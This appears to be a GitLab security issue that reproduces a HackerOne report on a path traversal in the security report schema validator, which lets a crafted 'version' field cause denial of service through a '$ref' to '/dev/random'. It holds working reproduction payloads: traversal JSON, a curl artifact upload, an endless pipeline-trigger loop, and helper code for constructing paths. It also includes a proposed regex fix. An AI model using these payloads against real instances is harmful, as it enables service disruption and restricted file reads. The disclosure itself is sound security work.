Path Traversal leads to DoS and Restricted File Read through Report Artifact Parsing (Affects GitLab.com)
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #2401952](https://hackerone.com/reports/2401952)** by `pwnie` on 2024-03-05, assigned to @ngeorge1:
[Report](#report) | [How To Reproduce](#how-to-reproduce)
## Report
##### Summary
`lib/gitlab/ci/parsers/security/validators/schema_validator.rb` contains a `File.join` call that includes user-controlled input (`report_version`):
```ruby
def schema_path
  # The schema version selection logic here is described in the user documentation:
  # https://docs.gitlab.com/ee/user/application_security/#security-report-validation
  report_declared_version = File.join(root_path, report_version, file_name)
  return report_declared_version if File.file?(report_declared_version)
  # ... (rest of the method omitted in this excerpt)
end
```
This value can be controlled by uploading a bogus artifact file named `gl-secret-detection-report.json` with artifact type `secret_detection` and a `version` JSON field containing path traversal sequences.
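To illustrate why the `File.join` call is dangerous, here is a minimal sketch of how a traversal in `report_version` escapes the schema directory. The root directory `/opt/schemas`, the version strings, and the helper names `declared_schema_path` and `escapes_root?` are assumptions made for illustration; they are not taken from the GitLab code base.

```ruby
# Hypothetical schema root standing in for the validator's root_path.
ROOT_PATH = '/opt/schemas'
FILE_NAME = 'secret-detection-report-format.json'

# Mirrors the File.join call in schema_path; report_version is attacker-controlled.
def declared_schema_path(report_version)
  File.join(ROOT_PATH, report_version, FILE_NAME)
end

# True when the normalized path no longer lives under ROOT_PATH.
def escapes_root?(path)
  !File.expand_path(path).start_with?("#{ROOT_PATH}/")
end

benign  = declared_schema_path('15.0.4')
hostile = declared_schema_path('../../tmp/uploads')

puts File.expand_path(benign)   # /opt/schemas/15.0.4/secret-detection-report-format.json
puts File.expand_path(hostile)  # /tmp/uploads/secret-detection-report-format.json
puts escapes_root?(hostile)     # true
```

`File.join` only concatenates path segments, so the `..` components survive and are resolved later by the file system, which is what lets the declared version point at any attacker-chosen directory.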
The resulting path is then passed to `JSONSchemer.schema(pathname)` and used to validate the CI scan artifact. Since we control the schema that's used, we can use `$ref`s to include external schemas. `JSONSchemer` allows file system access, though not network access unless explicitly passed as an option. I thoroughly read the JSONSchemer code for any way to escalate this (dumping sensitive JSON files by referencing them with `$ref`) and I don't think it's possible (I could be wrong). The reason I looked is that JSONSchemer conveniently returns errors during validation, and GitLab parses them and returns them to the user:
```ruby
schema_validation_errors = schema.validate(report_data).map { |error| JSONSchemer::Errors.pretty(error) }
```
This means that if we could reference a sensitive JSON file and somehow get validation to fail with the **values** of that file included in the error, we'd be golden. However, the JSONSchemer code has a very short list of what it can return:
```ruby
def pretty(error)
  data_pointer, type, schema = error.values_at('data_pointer', 'type', 'schema')
  location = data_pointer.empty? ? 'root' : "property '#{data_pointer}'"
  case type
  when 'required'
    keys = error.fetch('details').fetch('missing_keys').join(', ')
    "#{location} is missing required keys: #{keys}"
  when 'null', 'string', 'boolean', 'integer', 'number', 'array', 'object'
    "#{location} is not of type: #{type}"
  when 'pattern'
    "#{location} does not match pattern: #{schema.fetch('pattern')}"
  when 'format'
    "#{location} does not match format: #{schema.fetch('format')}"
  when 'const'
    "#{location} is not: #{schema.fetch('const').inspect}"
  when 'enum'
    "#{location} is not one of: #{schema.fetch('enum')}"
  else
    "#{location} is invalid: error_type=#{type}"
  end
end
```
`schema` would be the file we are referencing (any sensitive JSON file we want to leak), but since it obviously isn't a schema, it's very hard to get anything useful from these errors. That said, there is a vast array of JSON files on a given Omnibus installation, many of them log files that we can probably control and hence use to do something interesting.
```
root@gitlab:/# find . -name '*.json' 2>/dev/null | wc -l
913
```
Though I find that too painstakingly boring to pursue so I'll just leave it to you guys to decide whether or not this constitutes a file read at all.
The real issue I discovered is the ability to hang a Rails process and rapidly consume lots of RAM, because the referenced file is read until its end:
```
.read(name, [length [, offset]][, opt]) ⇒ String
Opens the file, optionally seeks to the given offset, then returns length bytes (defaulting to the rest of the file). #read ensures the file is closed before returning.
```
This is triggered by supplying `/dev/random` as the target path. I've seen people rewarded pretty big bounties for server-side ReDoS, so that's why I decided to report this.
e.g. https://gitlab.com/gitlab-org/gitlab/-/issues/416225
##### Steps to reproduce
1. Configure an Omnibus GitLab instance with an Ultimate license
2. Create a project
3. Ensure the GitLab instance has shared runners available or configure a runner for the project
4. Ensure the runner can handle more than one build at a time (in `/etc/gitlab-runner/config.toml`, set `concurrent = 10`)
5.1 Edit the `.gitlab-ci.yml` file in your newly created project to:
```
bogus_artifact:
  script: |
    curl -X POST -v -F "file=@gl-secret-detection-report.json" "YOUR_GITLAB_INSTANCE_URL/api/v4/jobs/$CI_JOB_ID/artifacts?artifact_format=raw&artifact_type=secret_detection&token=$CI_JOB_TOKEN"
```
5.2 Replace `YOUR_GITLAB_INSTANCE_URL` with your GitLab instance URL
6.1 Create a file locally named `secret-detection-report-format.json` with the contents `{"$ref": "/dev/random"}`
6.2 Create a new issue in the project and upload the file in a comment
7. Calculate the hashed path of the uploaded file, starting with the SHA-256 hash of the project ID (the numeric ID, such as 34)
8. Construct the hashed path by taking the first 2 characters of the hash as the first directory, the next 2 characters as the second directory, and the entire hash as the third (see the example below). Then take the secret of the file you uploaded (copy the link URL from the comment and keep just the 32-character hex part) and append it to the path constructed so far: `4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/725cc8b62466087c472932f7ce4b96de`
9. Create a file named `gl-secret-detection-report.json` in your new project with the following contents, replacing `YOUR_FULL_HASH_PATH` with the full path you just constructed:
```
{"version": "../../../../../../../../../../../../../../../../../../../../../../../../../var/opt/gitlab/gitlab-rails/uploads/@hashed/YOUR_FULL_HASH_PATH"}
```
10. Go to settings/ci_cd in your project (Settings -> CI/CD), look for Pipeline trigger tokens, add a new token, then copy and save it
11. Execute the following command replacing the placeholders appropriately:
```
while true; do curl -X POST \
--fail \
-F token=YOUR_PIPELINE_TOKEN \
-F ref=main \
http://YOUR_GITLAB_INSTANCE/api/v4/projects/YOUR_PROJECT_ID/trigger/pipeline; done
```
12. This should generate many pipelines that are then handled by the runners configured for the project. If you properly configured the runner or runners to run multiple builds at once, you should see an increase in memory usage on your Gitlab instance once the pipelines are completed. This is due to `/dev/random` being read during the artifact parsing service.
13. To verify that this is indeed crashing Sidekiq (artifact parsing is run as a worker after a pipeline completes), you can do:
```
cat sidekiq/current | grep -i terminate
{"severity":"INFO","time":"2024-03-05T04:06:53.471Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:08:56.919Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:16:05.432Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:17:28.958Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:18:52.534Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:25:56.008Z","message":"A worker terminated, shutting down the cluster"}
```
Alternatively, just watch system resource usage rapidly increase, then drop when the Sidekiq process is killed along with any jobs it was handling.
14. Since this kills Sidekiq clusters, you can disrupt any jobs that are running or queued to run. This is essentially a Sidekiq DoS and makes GitLab unusable.
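The path construction in steps 7 and 8 can be sketched in Ruby as follows. The helper name `hashed_upload_path` is hypothetical, and the project ID `3` is an assumption chosen because its SHA-256 digest appears to match the example path in step 8; substitute your own project ID and upload secret.

```ruby
require 'digest'

# Hypothetical helper: builds the relative upload path described in steps 7 and 8.
# project_id    - numeric project ID
# upload_secret - 32-character hex secret taken from the uploaded file's URL
def hashed_upload_path(project_id, upload_secret)
  hash = Digest::SHA256.hexdigest(project_id.to_s)
  # First two characters, next two characters, the full hash, then the secret.
  File.join(hash[0, 2], hash[2, 2], hash, upload_secret)
end

puts hashed_upload_path(3, '725cc8b62466087c472932f7ce4b96de')
```

The printed value is what replaces `YOUR_FULL_HASH_PATH` in the `version` field from step 9.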
##### Impact
DoS of GitLab instance Sidekiq clusters
##### Environment
GitLab Enterprise Edition v16.7.3-ee Omnibus Package
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
## Implementation
1. Add regex validation for `report_version` to `Gitlab::Ci::Parsers::Security::Validators`. Copy over the [schema format](https://gitlab.com/gitlab-org/security-products/security-report-schemas/-/blob/e3d280d7f0862ca66a1555ea8b24016a004bb914/src/security-report-format.json#L151) for consistency.
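A minimal sketch of what such a check could look like, assuming the version is a plain `MAJOR.MINOR.PATCH` string. Both the pattern `VERSION_PATTERN` and the helper `valid_report_version?` are hypothetical; the actual pattern should be copied from the linked schema definition rather than from this example.

```ruby
# Assumed pattern: a plain MAJOR.MINOR.PATCH version string.
# \A and \z anchor the whole string, so embedded newlines cannot smuggle a path past the check.
VERSION_PATTERN = /\A\d+\.\d+\.\d+\z/

# Hypothetical helper, not the actual GitLab implementation.
def valid_report_version?(report_version)
  report_version.is_a?(String) && VERSION_PATTERN.match?(report_version)
end

puts valid_report_version?('15.0.4')            # true
puts valid_report_version?('../../../var/opt')  # false
```

Rejecting the version before it reaches `File.join` means the traversal string is never turned into a file system path at all.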